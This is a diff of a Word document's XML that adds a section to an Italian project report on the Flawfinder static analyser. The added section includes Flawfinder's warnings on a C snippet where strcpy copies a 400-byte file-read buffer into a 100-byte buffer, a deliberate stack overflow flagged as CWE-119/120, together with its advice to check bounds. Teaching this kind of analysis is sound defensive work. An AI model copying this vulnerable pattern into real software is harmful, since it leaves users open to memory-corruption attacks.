+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Il software open source è facilmente scaricabile dal sito </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Collegamentoipertestuale"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:lang w:val="it-IT"/>
+          </w:rPr>
+          <w:t>https://dwheeler.com/flawfinder/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, dove si trovano anche tutte le informazioni necessarie all’installazione, esecuzione e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">indicazioni utili ad interpretare i </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>risultati</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ottenuti dal test</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Dopo aver eseguito il software sul codice prodotto in questo progetto, sono risultati diversi warning, tra cui:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grigliatabella"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9628"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="397"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9628" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="nil"/>
+              <w:left w:val="nil"/>
+              <w:bottom w:val="nil"/>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>S'char</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>buffer[</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>100];\n\t/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>* The following statement has a buffer overflow problem *</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>/\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>tstrcpy</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>(buffer, str);\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>treturn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 1;\n}\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>nint</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> main(int </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>argc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>, char **</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>argv</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>)\n{\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>tchar</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> str[400];\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>tFILE</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> *</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>badfile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>;\n\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>tbadfile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>fopen</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>("</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>badfile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>", "r");\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>tfread</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(str, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>sizeof</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(char), 300, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>badfile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>);\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>tfoo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>(str);\n\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>tprintf</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>("Returned Properly\\n");\n\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>treturn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 1;\n}\n'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Seguito da un messaggio contente consigli utili a risolvere il problema indicato.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grigliatabella"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9628"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="397"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9628" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="nil"/>
+              <w:left w:val="nil"/>
+              <w:bottom w:val="nil"/>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>'Statically-sized arrays can be improperly restricted, leading to potential overflows or other issues (CWE-</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>119!/</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>CWE-120)'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>'Perform bounds checking, use functions that limit length, or ensure that the size is larger than the maximum possible length'</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Esistono diversi software che offrono servizi di questo genere, sia a livello statico sia a livello dinamico. Possono risultare estremamente utili per aiutare lo sviluppatore a non commettere errori programmativi che porterebbero a compromettere il sistema implementato.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titolo1"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>6)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9977,7 +11169,7 @@
           <w:lang w:val="it-IT"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId7" w:history="1">
+      <w:hyperlink r:id="rId8" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Collegamentoipertestuale"/>
@@ -10041,7 +11233,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
+      <w:hyperlink r:id="rId9" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Collegamentoipertestuale"/>
@@ -10095,7 +11287,7 @@
           <w:lang w:val="it-IT"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId9" w:history="1">
+      <w:hyperlink r:id="rId10" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Collegamentoipertestuale"/>
@@ -10125,7 +11317,10 @@
         </w:numPr>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rStyle w:val="Collegamentoipertestuale"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
       </w:pPr>
@@ -10143,7 +11338,7 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Collegamentoipertestuale"/>
@@ -10153,6 +11348,83 @@
           <w:t>https://www.youtube.com/watch?v=hJ8IwyhqzD4</w:t>
         </w:r>
       </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Collegamentoipertestuale"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sito ufficiale </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Flawfinder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Collegamentoipertestuale"/>
+            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:lang w:val="it-IT"/>
+          </w:rPr>
